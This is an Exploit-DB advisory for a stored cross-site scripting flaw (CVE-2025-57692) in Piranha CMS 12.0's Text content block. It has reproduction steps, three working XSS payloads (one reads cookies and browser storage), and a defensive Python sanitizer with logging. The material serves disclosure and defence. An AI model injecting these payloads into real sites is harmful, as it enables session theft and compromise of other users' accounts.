Exploit-DB.com RSS Feed

OffSec’s Exploit Database Archive
terminalvenoms · 2026-02-02 · via Exploit-DB.com RSS Feed
# Exploit Title: Piranha CMS 12.0 - Stored Cross Site Scripting 
# Date: 2025-09-26
# Exploit Author: Chidubem Chukwu (Terminal Venom)
# LinkedIn : https://www.linkedin.com/in/chidubem-chukwu-20bb202a9?
# Vendor Homepage: https://piranhacms.org
# Software Link: https://github.com/PiranhaCMS/piranha.core/releases/tag/v12.0
# Version: 12.0
# Category: Web Application
# Tested on: Ubuntu 22.04, Piranha CMS v12.0 (local), Chrome 
# CVE: CVE-2025-57692
# Privilege Level: authenticated user
# Patched Version: Not available
# Exploit link: https://github.com/Saconyfx/security-advisories/blob/main/CVE-2025-57692/advisory.md

## Reproduction Steps ##

PiranhaCMS 12.0 allows stored XSS in the Text content block of Standard and Standard Archive Pages via /manager/pages, enabling execution of arbitrary JavaScript in another user's browser.

	1.	Log in to the Piranha admin panel at https://<host>/manager/login.

	2.	Navigate to Pages.

	3.	Click Add Page and choose Standard Page or Standard Archive.

	4.	Enter a page title (e.g., XSS-Test).

	5.	Click the [ + ] button and select Text under Content to add a Text block.

	6.	In the Text block input area, paste one of the payloads below (paste directly into the editor and save). The payload will execute immediately when pasted/saved and will also execute for anyone who later accesses or previews the page.

Payload A 

<img src="x" onerror="
  alert(
    'Cookies: ' + document.cookie + '\n' +
    'LocalStorage: ' + JSON.stringify(localStorage) + '\n' +
    'SessionStorage: ' + JSON.stringify(sessionStorage) + '\n' +
    'URL: ' + window.location.href + '\n' +
    'User Agent: ' + navigator.userAgent + '\n' +
    'Time: ' + new Date().toLocaleString()
  )
" />

Payload B — iframe base64 

<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>

Payload C — details toggle (on-toggle alert)

<details open ontoggle=alert('XSS')>Click</details>

	7.	Click Save. The payload executes immediately upon save (and will execute again when the page is previewed or accessed by others).

	8.	Anyone who accesses the page (or pastes the payload) will trigger the XSS.
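The fix on the CMS side is to sanitize stored Text block markup against an allowlist before it is persisted or rendered, so that event-handler attributes and non-HTTP URL schemes never reach another user's browser. The sanitizer below is an added defensive example and not Piranha CMS's own code; the allowlisted tags, attributes and schemes are constructed assumptions for a rich-text block, and the inputs in the comments are the three payload shapes from the advisory above.

```python
import html
import re
from html.parser import HTMLParser

# Allowlist policy for a rich-text Text block. This is a constructed example
# policy, not Piranha CMS's own sanitizer or configuration.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "ul", "ol", "li", "a", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
VOID_TAGS = {"br", "img"}
SAFE_SCHEMES = {"http", "https", "mailto"}
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.-]*):")

def url_is_safe(value):
    # Reject javascript:, data: and any other scheme not on the allowlist;
    # whitespace/control characters are stripped first because browsers ignore them.
    v = re.sub(r"[\s\x00-\x1f]", "", (value or "").lower())
    m = SCHEME_RE.match(v)
    return m is None or m.group(1) in SAFE_SCHEMES

class TextBlockSanitizer(HTMLParser):
    """Rebuilds markup from the allowlist; everything else is dropped and logged."""
    def __init__(self):
        super().__init__()
        self.out, self.dropped = [], []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:            # <iframe>, <details>, <script>, ...
            self.dropped.append(f"tag:{tag}")
            return
        kept = []
        for name, value in attrs:
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append(f"attr:{tag}@{name}")   # onerror, ontoggle, ...
            elif name in ("href", "src") and not url_is_safe(value):
                self.dropped.append(f"url:{tag}@{name}")    # data:text/html;base64,...
            else:
                kept.append(f' {name}="{html.escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(html.escape(data))     # text is never re-interpreted as markup

def sanitize(markup):
    """Return (clean_html, dropped_items) for a submitted Text block."""
    p = TextBlockSanitizer()
    p.feed(markup)
    p.close()
    return "".join(p.out), p.dropped
```

The `dropped` list is worth logging: a Text block submission that sheds an `on*` attribute or a `data:` URL is a useful signal for detecting attempts like the ones above.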